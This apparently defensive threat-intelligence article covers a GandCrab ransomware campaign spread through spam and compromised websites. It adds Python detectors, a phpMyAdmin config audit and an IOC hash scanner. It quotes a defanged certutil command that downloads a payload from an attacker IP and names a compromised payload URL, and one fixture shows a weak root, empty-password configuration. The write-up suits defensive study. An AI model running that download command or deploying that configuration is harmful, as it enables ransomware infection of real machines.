GandCrab Ransomware

A GandCrab ransomware campaign is targeting Windows users through compromised websites, leveraging multiple MySQL vulnerabilities on those sites to host and distribute the payload.

Most small and medium-business websites are unaware of newly disclosed vulnerabilities that can be used to compromise them.

GandCrab is one of the most widely spread ransomware families today; it is under constant development, with new features added to target various countries.

It keeps leveraging the thousands of vulnerabilities present in millions of web pages to reach users, compromise their systems, encrypt their files and demand a ransom.

In addition, this kind of sophisticated malware is distributed through legitimate websites after the systems behind them have been compromised.

GandCrab's operators scan web pages across the internet to find vulnerable websites and then leverage them to distribute the ransomware widely.

GandCrab Ransomware Infection Vectors

Initially, GandCrab was distributed around the end of April via a large-scale email spam campaign in which the messages posed as an online order.

Each email carries an attached ZIP file containing a Word document with macros that download and execute the GandCrab ransomware.

A few other spam campaigns contain a VBScript instead of the ZIP file; the script pulls down the ransomware payload by connecting to its command-and-control server.

This malware also uses a built-in system utility to download the payload: certutil.exe, a command-line tool installed as part of Certificate Services.

It uses the following syntax to download the payload and install it on the victim's machine:

    certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe C:\Users\ADMINI~1\AppData\Local\Temp\FVAacW.exe

  1. The -urlcache flag is designed to display or delete URL cache entries.
  2. With the -f and -split flags, adversaries can force the URL to be downloaded to the given location.

The downloaded file is then executed, installing GandCrab on the target system.
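The certutil download pattern above is easy to spot in process-creation telemetry. The following detector is an added example written for this article (not code from the article or from Cisco): it parses a constructed, simplified log format (`<ts> host=… user=… image=… cmdline="…"`, an assumption, not any product's real format), flags certutil.exe invocations that combine -urlcache with -f and a URL, and raises the severity when the destination is an executable written to a user-writable location. The first sample event reuses the command line quoted in the article; the other events and the severity heuristic are constructed.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation events (not real telemetry).
# Assumed format: "<ts> host=<h> user=<u> image=<path> cmdline="<command line>""
SAMPLE_EVENTS = [
    '2018-05-01T10:01:02Z host=ws01 user=alice image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil.exe -urlcache -split -f hxxp://185.189.58[.]222/bam.exe '
    'C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\FVAacW.exe"',
    '2018-05-01T10:02:10Z host=ws02 user=bob image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil.exe -verify C:\\certs\\server.cer"',
    '2018-05-01T10:03:30Z host=ws03 user=svc image=C:\\Windows\\System32\\certutil.exe '
    'cmdline="certutil -URLCACHE -f http://crl.example.invalid/ca.crl C:\\Windows\\Temp\\ca.crl"',
    '2018-05-01T10:04:00Z host=ws01 user=alice image=C:\\Program Files\\App\\app.exe '
    'cmdline="app.exe --update"',
]

EVENT_RE = re.compile(
    r'^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'image=(?P<image>.+?) cmdline="(?P<cmdline>.*)"$'
)
URL_RE = re.compile(r'^(?:https?|hxxps?|ftp)://', re.IGNORECASE)
EXEC_EXT = ('.exe', '.dll', '.scr', '.ps1', '.vbs', '.js', '.bat', '.cmd')
USER_WRITABLE = ('\\appdata\\', '\\temp\\', '\\users\\public\\', '\\programdata\\')


@dataclass
class Finding:
    ts: str
    host: str
    user: str
    url: str
    dest: str
    severity: str


def refang(url: str) -> str:
    """Turn a defanged indicator (hxxp://, [.]) back into a normal URL for matching."""
    return url.replace('hxxp', 'http').replace('[.]', '.')


def analyse_event(line: str):
    """Return a Finding when the event is a certutil download, else None."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    image = m['image'].replace('/', '\\').rsplit('\\', 1)[-1].lower()
    if image != 'certutil.exe':
        return None
    tokens = m['cmdline'].split()
    flags = {t.lower() for t in tokens if t.startswith('-')}
    # The download pattern from the article: -urlcache together with -f (usually -split too).
    if '-urlcache' not in flags or '-f' not in flags:
        return None
    urls = [refang(t) for t in tokens if URL_RE.match(t)]
    if not urls:
        return None
    # The last positional argument after the URL is the output path.
    positional = [t for t in tokens[1:] if not t.startswith('-') and not URL_RE.match(t)]
    dest = positional[-1] if positional else ''
    dest_l = dest.lower()
    severity = 'medium'  # any certutil download is worth a look
    if dest_l.endswith(EXEC_EXT) and any(p in dest_l for p in USER_WRITABLE):
        severity = 'high'  # executable dropped into a user-writable/temp path
    return Finding(m['ts'], m['host'], m['user'], urls[0], dest, severity)


def scan(events):
    """Run the detector over an iterable of log lines and collect findings."""
    return [f for f in (analyse_event(e) for e in events) if f is not None]


if __name__ == '__main__':
    for f in scan(SAMPLE_EVENTS):
        print(f'{f.severity.upper():6} {f.ts} {f.host} {f.user}: {f.url} -> {f.dest}')
```

The -verify invocation produces no finding, the CRL download is reported at medium severity, and the article's payload download is reported as high because an .exe lands under AppData\Local\Temp.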

Later, Cisco researchers observed the same campaign being distributed from a different location, an actual legitimate website (www[.]pushpakcourier[.]net), and validated this by successfully downloading the payload from hxxp://www[.]pushpakcourier[.]net/js/kukul.exe.

Further investigation revealed that the compromised website was running phpMyAdmin with default credentials and was affected by multiple MySQL vulnerabilities, which helped the attacker take it over and use it to distribute the ransomware.
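A site owner can check for the weak phpMyAdmin settings that make this kind of takeover easy. The audit below is an added example (not the article's code and not a phpMyAdmin tool): it parses the `$cfg['Servers'][$i][...]` directives from a config.inc.php fragment and flags stored root credentials, empty passwords, `AllowNoPassword`, root login left enabled and a missing `blowfish_secret`. The directive names are real phpMyAdmin configuration keys; both configuration fragments are constructed for the example, and the weak one is placed beside a hardened one.

```python
import re

# Constructed config.inc.php fragments (not taken from the compromised site).
WEAK_CONFIG = r"""
$cfg['blowfish_secret'] = '';
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = '';
$cfg['Servers'][$i]['AllowNoPassword'] = true;
"""

HARDENED_CONFIG = r"""
$cfg['blowfish_secret'] = 'replace-with-32-random-characters';
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;
$cfg['Servers'][$i]['AllowRoot'] = false;
"""

SERVER_RE = re.compile(r"\$cfg\['Servers'\]\[\$i\]\['(\w+)'\]\s*=\s*(.+?);")
GLOBAL_RE = re.compile(r"\$cfg\['(\w+)'\]\s*=\s*(.+?);")


def parse_value(raw: str):
    """Map a PHP literal (true/false or a quoted string) to a Python value."""
    raw = raw.strip()
    if raw.lower() in ('true', 'false'):
        return raw.lower() == 'true'
    return raw.strip("'\"")


def parse_config(text: str):
    """Return (global settings, per-server settings) found in the fragment."""
    glob, server = {}, {}
    for line in text.splitlines():
        m = SERVER_RE.search(line)
        if m:
            server[m.group(1)] = parse_value(m.group(2))
            continue
        m = GLOBAL_RE.search(line)
        if m:
            glob[m.group(1)] = parse_value(m.group(2))
    return glob, server


def audit(text: str):
    """List the weak settings present in a config.inc.php fragment."""
    glob, srv = parse_config(text)
    issues = []
    if srv.get('AllowNoPassword') is True:
        issues.append('AllowNoPassword is true: accounts with an empty password can log in')
    if srv.get('auth_type') == 'config':
        issues.append("auth_type 'config': credentials live in config.inc.php and nobody is prompted")
        if srv.get('user') == 'root':
            issues.append('stored credentials are for the MySQL root account')
        if srv.get('password') == '':
            issues.append('stored password is empty')
    # AllowRoot defaults to true when the directive is absent.
    if srv.get('AllowRoot', True) is True:
        issues.append('AllowRoot not disabled: root may log in through the web interface')
    if len(glob.get('blowfish_secret', '')) < 32:
        issues.append('blowfish_secret missing or too short for cookie authentication')
    return issues


if __name__ == '__main__':
    for name, cfg in (('weak', WEAK_CONFIG), ('hardened', HARDENED_CONFIG)):
        print(name, audit(cfg) or ['no issues'])
```

The hardened fragment still needs the phpMyAdmin installation itself to be kept patched; the audit only covers the credential and login settings the article's compromise turned on.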

The ransomware then encrypts the victim's files and appends the .CRAB extension to each file name; for example, Image.jpg becomes Image.jpg.CRAB.
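The rename pattern (original name kept, .CRAB appended) is itself a usable detection signal. The following is an added example, not the article's code: it runs over constructed file-rename events, recognises renames that merely append the .CRAB extension, and raises one alert per process once a burst of such renames lands inside a short time window. The event tuples, the threshold and the window are assumptions chosen for the example; the process name FVAacW.exe is the dropped file name from the article.

```python
from collections import defaultdict, deque
from datetime import datetime

# Extension the article reports GandCrab appending to encrypted files.
RANSOM_EXTENSIONS = ('.crab',)

# Constructed sample rename events (not real telemetry):
# (timestamp, process, old_path, new_path)
SAMPLE_RENAMES = [
    ('2018-05-01T11:00:00', 'FVAacW.exe', r'C:\Users\alice\Pictures\Image.jpg', r'C:\Users\alice\Pictures\Image.jpg.CRAB'),
    ('2018-05-01T11:00:03', 'FVAacW.exe', r'C:\Users\alice\Documents\budget.xlsx', r'C:\Users\alice\Documents\budget.xlsx.CRAB'),
    ('2018-05-01T11:00:05', 'explorer.exe', r'C:\Users\alice\Documents\report.docx', r'C:\Users\alice\Documents\report_final.docx'),
    ('2018-05-01T11:00:06', 'FVAacW.exe', r'C:\Users\alice\Documents\notes.txt', r'C:\Users\alice\Documents\notes.txt.CRAB'),
    ('2018-05-01T11:00:08', 'FVAacW.exe', r'C:\Users\alice\Desktop\todo.txt', r'C:\Users\alice\Desktop\todo.txt.CRAB'),
    ('2018-05-01T11:00:09', 'backup.exe', r'D:\backup\db.sql', r'D:\backup\db.sql.bak'),
    ('2018-05-01T11:00:10', 'FVAacW.exe', r'C:\Users\alice\Desktop\photo.png', r'C:\Users\alice\Desktop\photo.png.CRAB'),
    ('2018-05-01T11:00:12', 'FVAacW.exe', r'C:\Users\alice\Music\song.mp3', r'C:\Users\alice\Music\song.mp3.CRAB'),
]


def is_ransom_rename(old: str, new: str) -> bool:
    """True when new is exactly old with a known ransom extension appended."""
    low = new.lower()
    return any(low.endswith(ext) and new[:-len(ext)] == old for ext in RANSOM_EXTENSIONS)


def original_name(path: str) -> str:
    """Strip the appended ransom extension (Image.jpg.CRAB -> Image.jpg) for inventory work."""
    for ext in RANSOM_EXTENSIONS:
        if path.lower().endswith(ext):
            return path[:-len(ext)]
    return path


def detect_bursts(events, threshold=5, window_seconds=60):
    """Alert once per process when `threshold` ransom-style renames fall inside `window_seconds`.

    Returns a list of (process, timestamp_of_alert, renames_in_window)."""
    recent = defaultdict(deque)   # process -> timestamps of its recent ransom renames
    alerted = set()
    alerts = []
    for ts, proc, old, new in events:
        if not is_ransom_rename(old, new):
            continue  # ordinary renames (report.docx -> report_final.docx, .bak) are ignored
        t = datetime.fromisoformat(ts)
        q = recent[proc]
        q.append(t)
        while q and (t - q[0]).total_seconds() > window_seconds:
            q.popleft()  # slide the window forward
        if len(q) >= threshold and proc not in alerted:
            alerted.add(proc)
            alerts.append((proc, ts, len(q)))
    return alerts


if __name__ == '__main__':
    for proc, ts, n in detect_bursts(SAMPLE_RENAMES):
        print(f'{ts}: {proc} appended .CRAB to {n} files within the window')
```

On the sample events the alert fires on the fifth .CRAB rename by FVAacW.exe; the explorer.exe and backup.exe renames never count because the new name is not the old name plus a ransom extension.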

Once the infection is complete, it displays ransom notes containing information about the payment and the ways to communicate with the attackers.

The attackers have compromised various unsecured sites and used them to distribute GandCrab widely.

GandCrab IOC hashes (SHA-256):

6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501
692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08
ad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c
3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e
521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d
9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6
27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad
ce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706
0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5
07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257
0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e
812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0
d25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a
ee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55
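The hash list above is only useful once it is compared against files on disk. The scanner below is an added example (not the article's code): it embeds the article's SHA-256 indicators, hashes files under a directory in fixed-size chunks, and reports any file whose digest is on the list. The hashing and matching are separated so the matching logic can be exercised without a real sample; the demo directory and its empty file are constructed.

```python
import hashlib
import os
import tempfile

# SHA-256 indicators as published in the article.
GANDCRAB_SHA256 = {
    '6a623b1e016fc0df94fe27a3eb9cc1128c5ee3831a7dcc8e4879427167a41501',
    '692c023850bbd95f116d5a623a5e0de9ad0ad13fadb3d89e584cc0aa5dc71f08',
    'ad48c3770736588b17b4af2599704b5c86ff8ae6dadd30df59ea2b1ccc221f9c',
    '3486088d40d41b251017b4b6d21e742c78be820eaa8fe5d44eee79cf5974477e',
    '521fcb199a36d2c3b3bac40b025c2deac472f7f6f46c2eef253132e9f42ed95d',
    '9ba87c3c9ac737b5fd5fc0270f902fbe2eabbb1e0d0db64c3a07fea2eeeb5ba6',
    '27431cce6163d4456214baacbc9fd163d9e7e16348f41761bac13b65e3947aad',
    'ce9c9917b66815ec7e5009f8bfa19ef3d2dfc0cf66be0b4b99b9bebb244d6706',
    '0b8618ea4aea0b213278a41436bde306a71ca9ba9bb9e6f0d33aca1c4373b3b5',
    '07adce515b7c2d6132713b32f0e28999e262832b47abc26ffc58297053f83257',
    '0f8ac8620229e7c64cf45470d637ea9bb7ae9d9f880777720389411b75cbdc2e',
    '812a7387e6728f462b213ff0f6ccc3c74aff8c258748e4635e1ddfa3b45927f0',
    'd25d1aba05f4a66a90811c31c6f4101267151e4ec49a7f393e53d87499d5ea7a',
    'ee24d0d69b4e6c6ad479c886bb0536e60725bfa0becdafecadafc10e7a231a55',
}


def sha256_file(path: str, chunk: int = 1 << 20) -> str:
    """Hex SHA-256 of a file, read in 1 MiB chunks so large files do not load into memory."""
    h = hashlib.sha256()
    with open(path, 'rb') as fh:
        for block in iter(lambda: fh.read(chunk), b''):
            h.update(block)
    return h.hexdigest()


def iter_file_hashes(root: str):
    """Yield (path, sha256) for every readable file below root."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                yield path, sha256_file(path)
            except OSError:
                continue  # unreadable or vanished file: skip, do not abort the scan


def match_iocs(path_digest_pairs, iocs=GANDCRAB_SHA256):
    """Return the (path, digest) pairs whose digest is on the indicator list."""
    wanted = {d.lower() for d in iocs}
    return [(p, d) for p, d in path_digest_pairs if d.lower() in wanted]


def scan_directory(root: str, iocs=GANDCRAB_SHA256):
    return match_iocs(iter_file_hashes(root), iocs)


def demo_scan():
    """Constructed demo: hash an empty file in a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, 'empty.bin')
        open(path, 'wb').close()
        return sha256_file(path), scan_directory(d)


if __name__ == '__main__':
    digest, hits = demo_scan()
    print('empty file digest:', digest)
    print('matches:', hits or 'none')
```

Hash matching catches only the exact samples on the list; a repacked or rebuilt payload has a different digest, so this check complements, rather than replaces, the behavioural detections (certutil downloads, bursts of .CRAB renames) described earlier in the article.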